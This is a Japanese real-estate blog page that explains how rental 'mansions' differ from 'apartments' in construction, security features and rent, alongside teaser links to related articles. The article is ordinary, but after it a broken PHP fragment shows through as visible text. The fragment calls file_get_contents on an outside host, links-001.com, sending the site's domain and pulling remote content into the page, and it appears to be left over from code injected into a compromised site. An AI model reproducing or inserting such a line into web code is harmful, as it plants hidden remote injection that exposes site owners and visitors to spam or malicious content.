前へ
次へ

女性専用賃貸マンションのチェックポイント

大都市を中心に増えているのが、女性専用賃貸マンションです。学生やOLを対象とした賃貸物件であり、女性

more

賃貸マンションでチェックしづらい音と光

賃貸マンションを利用するときは立地や賃料、設備などが希望に合うかを考えます。できればいい立地で賃料も

more

賃貸マンションに住むメリット

賃貸マンションに住むメリットにはどんな事があるのかお教えします。まず、年間にかかる費用が決まっている

more

賃貸マンションと賃貸アパートは何が違うのか

賃貸物件を探しているときに区分が賃貸マンションとなっているものと賃貸アパートとなっているものとが見つかり、何が違うのかと悩む人もいるでしょう。同じような仕様の集合住宅物件が見つかって、一方は賃貸マンション、他方は賃貸アパートと書かれているとますます違いを知りたくなるのはもっともなことです。実はこの二つは法律によって明確に区分されているわけではなく、物件のオーナーがマンションとするかアパートとするかによって決まっています。ただ、全体的な傾向としてはマンションの方が丈夫な作りになっていて設備も充実している代わりに家賃が高めになっています。造りとしてはマンションなら鉄筋コンクリート造のことがほとんどで、鉄骨造でもかなりしっかりとした建て方になっているのが一般的です。それに対してアパートの場合には木造のことが多く、鉄骨造の場合にも耐震基準が問題にならない程度のギリギリの構造になっている傾向があります。設備についてはマンションの場合にはエントランス部にセキュリティーが設けてあったり、監視カメラが設置されていたり、エレベーターが用意されていたりするなど、防犯性も利便性も高いのが普通です。アパートの場合には特に大きな設備投資をしていないことが多く、二階建てか三階建てで階段を使うようになっています。概してアパートの方が低コストということを重視して建てられている影響で、我慢しながら住まなければならない部分が見つかりやすい傾向があるのは確かです。賃貸マンションの中には分譲マンションの一部を賃貸用に利用しているものもあり、設備も環境もかなり高いレベルのものも少なくありません。あくまで全体的な傾向なのでマンションかアパートかで良し悪しを判断してしまわないようにした方が良いと言えます。ただ、家賃の高さよりも設備や環境を重視して選びたいと思っている場合には賃貸マンションを候補にした方が魅力的な物件を見つけやすいでしょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top